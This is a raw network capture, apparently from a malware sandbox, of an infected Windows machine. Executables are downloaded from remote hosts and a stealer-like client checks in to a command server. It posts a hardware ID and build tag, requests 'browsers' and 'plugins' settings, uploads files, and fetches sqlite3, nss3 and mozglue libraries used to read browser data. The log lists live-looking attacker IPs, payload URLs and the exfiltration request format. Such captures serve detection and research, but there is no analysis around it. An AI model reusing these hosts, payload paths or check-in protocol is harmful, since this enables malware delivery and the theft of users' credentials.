Feb 5, 2024 12:12:30.485552073 CET 604 IN HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:30 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Feb 5, 2024 12:12:30.746709108 CET | 286 | OUT | POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://gxeoatmtdelfcs.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 123
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:12:31.002487898 CET | 259 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:30 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 34 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a4 4e f2 7b a9 64 14 00 78 a2 3e 5c 67 d8 0f 2b 09 7a 80 f5 d3 ed d7 70 97 3f 2e 5e 61 be b4 bf f7 5a 6e 94 2b 7b be d5 d4 3f a6 55 70 fb 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 47Uys/~(`:LDN{dx>\g+zp?.^aZn+{?Up0
Feb 5, 2024 12:12:36.280669928 CET | 283 | OUT | POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://xmtbatfindi.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 139
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:12:36.536807060 CET | 604 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Feb 5, 2024 12:12:36.541537046 CET | 288 | OUT | POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://xpydamorejaxqinh.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:12:36.797749043 CET | 232 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 09 87 1c c1 57 9c f5 0f ae 66 f2 22 40 5a 3c bf 6f 0a 60 89 40 67 1b 71 c1 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2cUys/~(`:Wf"@Z<o`@gq0
Feb 5, 2024 12:12:47.475882053 CET | 286 | OUT | POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ksdsewppbovbyh.com/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 346
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:12:47.732340097 CET | 604 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:47 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49709 | 172.67.213.22 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:12:27.460700989 CET | 170 | OUT | GET /data/pdf/may.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Host: real.avalmag.com
Feb 5, 2024 12:12:27.796030998 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 7668707
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Description: File Transfer
                                                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=may.exe
                                                                                                                                                                                                                                                                                                                                                                Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: public
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8DDj5Jd8oE8KTt%2BYx3Q0bfwbun6txohwpNW9FRZFd1qsdYs726gbU%2Be4bAdZPDogNA9q07RDjCx%2FrCEi4ZTdVD%2FXVXxt4CbAQKi6zftp%2BQJN%2FQyMWyzOEbFx%2B5iDAFa2uJB%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab7ebff8506f2-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49716 | 185.172.128.19 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:12:31.224143028 CET | 189 | OUT | GET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.19
Feb 5, 2024 12:12:31.426954031 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:31 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 9104384
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 02 Feb 2024 16:13:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65bd14a7-8aec00"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427153111 CET1286INData Raw: f6 0c 27 84 c2 74 00 cd 00 46 12 c4 c2 72 00 32 ff 05 02 8d c7 e7 17 f3 44 57 08 2b c3 54 89 25 8b 77 24 7a c6 75 02 71 5f a5 66 e7 17 f3 44 57 08 2b c3 ba 17 b9 44 17 08 2d c3 fe cc bd cc aa cc a2 cc c2 9a a3 80 74 e9 15 12 32 00 89 ba a2 80 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 'tFr2DW+T%w$zuq_fDW+D-t2223qg]e`2UPs237aoV*2Yd2tnjxs-73}qUf
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427179098 CET1286INData Raw: e2 b2 00 9a b1 15 00 71 a3 42 1f ef 00 90 f9 55 00 74 85 f2 7d 3a 6a 3b e8 0c 0e 32 00 28 e8 df 24 6e 00 fd c0 0e 08 1e 09 da 6d 3c 00 33 59 21 e8 17 0f 71 00 3f 3b a8 74 7f 50 9b 5b 7a 00 32 59 da 50 17 00 72 84 6f c4 05 06 69 b7 23 c8 93 03 19
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: qBUt}:j;2($nm<3Y!q?;tP[z2YProi#-QbVZ3@r2E9$2b25E{}bQP2Y(e=EO2u5P"qnEwAre+22/r1fyQx2}@2]!
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427200079 CET1286INData Raw: 81 8c 00 7b 00 73 83 be 7f 54 89 66 24 35 d9 1e 24 34 c3 d8 00 66 08 6e 74 7e b8 74 00 74 00 f1 dc 37 d0 49 80 72 b8 33 00 71 00 a5 8b 2c 04 5d 00 73 f0 0b 3d 32 00 c2 7f 47 03 af 02 f1 8b 33 04 e5 ec 64 0d 78 00 8c 7f fd 44 16 06 b9 42 37 8b 78
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: {sTf$5$4fnt~tt7Ir3q,]s=2G3dxDB7xzD\P$9r2BbD\VtM=25$nD$,ZffLdtpfStaT qfx),Z5$b]s&Vv$uKxtI=2G_6$=
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427222013 CET1286INData Raw: 3d 32 00 ee 5d 8a dd 77 08 28 dc 3b f8 37 df 98 f6 b7 44 0e 0e 64 53 da f0 0d 00 72 dd 77 f8 28 59 8d 22 98 c3 58 75 9e dd 31 f8 61 83 de 10 ee 5c 56 08 ef 45 79 dd 7a 24 04 0c 12 10 9b 87 48 00 32 83 f6 1c 6d 5b bb c3 fe cc bd cc aa cc a2 cc be
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: =2]w(;7DdSrw(Y"Xu1a\VEyz$H2m[3xF{fn=raAGdmr2t=s239t8F3rr2-3UtS@3n1@n:
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.427246094 CET1286INData Raw: e8 f9 3d 6e 00 21 c3 f8 ff 21 8b de 56 b9 f0 d8 0b f9 06 b7 c0 05 02 99 d0 ed c6 7c 3b 06 08 06 f0 6c 5d f1 8b cc 55 f9 ec 64 8b 04 08 55 c0 85 0f fd c0 06 10 ff 0e b7 c9 46 02 cc d1 f1 c6 36 3b 04 0c 14 ec 30 5d bb 8b 8c 55 ff ec b1 3d f2 7a b3
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: =n!!V|;l]UdUF6;0]U=zrt+hz2sYFu;gHqY#AxhqZhC3(YB;@t;J2`2u$qcp3+t)h2sYFXY]%2 rX[nYeGq9/h,rq
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:31.629786968 CET1286INData Raw: 0b 46 05 b1 fb 37 75 63 8b 77 d4 f8 47 06 83 95 08 0d 06 f8 45 a4 89 75 64 01 c0 db 92 6e 00 32 c3 fa ff 33 8b 82 51 29 53 f8 5d 7c 56 65 33 c4 33 cc 89 0f fc 09 1c 8c 10 b7 80 6e 74 71 47 fa 7d 88 83 cd 17 40 ee b0 ff 65 0f b1 77 70 00 66 6a 6d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: F7ucwGEudn23Q)S]|Ve33ntqG}@ewpfjm)Ms-=rX@+nY=23qnxAu2h1qSqxW82dV'V0x`h62m2V saB2uThlxVb82!P6P>s


Session ID: 3 | Source IP: 192.168.2.6 | Source Port: 49725 | Destination IP: 2.180.10.7 | Destination Port: 80 | PID: 4004 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:12:41.408946991 CET | 162 | OUT | GET /check/index.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: trmpc.com
Feb 5, 2024 12:12:41.942852020 CET | 1286 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Mon, 05 Feb 2024 11:12:41 GMT
Content-Type: application/octet-stream
Connection: close
Content-Description: File Transfer
Content-Disposition: attachment; filename=6f897021.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public


Session ID: 4 | Source IP: 192.168.2.6 | Source Port: 49726 | Destination IP: 185.172.128.90 | Destination Port: 80 | PID: 4632 | Process: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe

Timestamp: Feb 5, 2024 12:12:41.673847914 CET | Bytes transferred: 152 | Direction: OUT | Data:
GET /cpa/ping.php?substr=four&s=ab HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 185.172.128.90
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: Feb 5, 2024 12:12:42.488270044 CET | Bytes transferred: 204 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:12:41 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 30
Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.6 | Source Port: 49728 | Destination IP: 185.172.128.127 | Destination Port: 80 | PID: 4632 | Process: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe

Timestamp: Feb 5, 2024 12:12:43.944772005 CET | Bytes transferred: 135 | Direction: OUT | Data:
GET /syncUpd.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 185.172.128.127
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: Feb 5, 2024 12:12:44.148356915 CET | Bytes transferred: 1286 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:12:44 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Feb 2024 11:00:02 GMT
ETag: "50000-610a05d0c651d"
Accept-Ranges: bytes
Content-Length: 327680
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program


Session ID: 6 | Source IP: 192.168.2.6 | Source Port: 49732 | Destination IP: 185.172.128.79 | Destination Port: 80 | PID: 5176 | Process: C:\Users\user\AppData\Local\Temp\nsx5151.tmp

Timestamp: Feb 5, 2024 12:12:47.574539900 CET | Bytes transferred: 414 | Direction: OUT | Data:
POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG
Host: 185.172.128.79
Content-Length: 213
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="hwid"995A8DE32C70330045240------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build"default------HDBGDHDAECBGDHJKFIDG--
Feb 5, 2024 12:12:47.927285910 CET 351 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:12:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 156
Connection: keep-alive
Vary: Accept-Encoding
Data Ascii: N2Y1OWY2ZDE5NTBjZTMxZWU0NmVmZjhmNWZlYWExMDZiMzMyOWQ2YjcyMTBiM2JkYTljNzY4MTI5NjU2OTViNmE5N2Y5ZGIzfGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Feb 5, 2024 12:12:48.049825907 CET 469 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCG
Host: 185.172.128.79
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii: ------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="message"browsers------FBFHJJJDAFBKEBGDGHCG--
Feb 5, 2024 12:12:48.374389887 CET 1286 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:12:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1520
Connection: keep-alive
Vary: Accept-Encoding
Feb 5, 2024 12:12:48.548130035 CET 468 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH
Host: 185.172.128.79
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="message"plugins------AECAECFCAAEBFHIEHDGH--
Feb 5, 2024 12:12:48.871295929 CET 1286 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:12:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5416
Connection: keep-alive
Vary: Accept-Encoding
Feb 5, 2024 12:12:49.105127096 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHC
Host: 185.172.128.79
Content-Length: 8087
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:12:49.441387892 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:12:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:12:50.081480026 CET 93 OUT GET /15f649199f40275b/sqlite3.dll HTTP/1.1
Host: 185.172.128.79
Cache-Control: no-cache
Feb 5, 2024 12:12:50.401521921 CET 1286 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:12:50 GMT
Content-Type: application/x-msdos-program
Content-Length: 1106998
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
Feb 5, 2024 12:12:52.405422926 CET 952 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH
Host: 185.172.128.79
Content-Length: 751
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:12:52.733498096 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:12:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:12:52.866394043 CET 560 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE
Host: 185.172.128.79
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:53.200797081 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:54.801529884 CET560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFC
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 359
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
Data Ascii: ------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="file"------GCBFBGCGIJKJJKFIDBFC--
Feb 5, 2024 12:12:55.129374027 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:12:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:12:55.936182022 CET 93 OUT GET /15f649199f40275b/freebl3.dll HTTP/1.1
Host: 185.172.128.79
Cache-Control: no-cache
Feb 5, 2024 12:12:56.256443977 CET 1286 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:12:56 GMT
Content-Type: application/x-msdos-program
Content-Length: 685392
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Feb 5, 2024 12:12:57.496983051 CET 93 OUT GET /15f649199f40275b/mozglue.dll HTTP/1.1
Host: 185.172.128.79
Cache-Control: no-cache
Feb 5, 2024 12:12:57.818609953 CET 1286 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:12:57 GMT
Content-Type: application/x-msdos-program
Content-Length: 608080
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Feb 5, 2024 12:12:58.492691040 CET 94 OUT GET /15f649199f40275b/msvcp140.dll HTTP/1.1
Host: 185.172.128.79
Cache-Control: no-cache
Feb 5, 2024 12:12:58.812927961 CET 1286 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:12:58 GMT
Content-Type: application/x-msdos-program
Content-Length: 450024
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Feb 5, 2024 12:12:59.349096060 CET 90 OUT GET /15f649199f40275b/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
Feb 5, 2024 12:12:59.670169115 CET 1286 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:59 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2046288
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Feb 5, 2024 12:13:02.884490013 CET 94 OUT GET /15f649199f40275b/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
Feb 5, 2024 12:13:03.202954054 CET 1286 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:03 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 257872
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
Feb 5, 2024 12:13:03.717631102 CET 98 OUT GET /15f649199f40275b/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
Feb 5, 2024 12:13:04.035901070 CET 1286 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:03 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
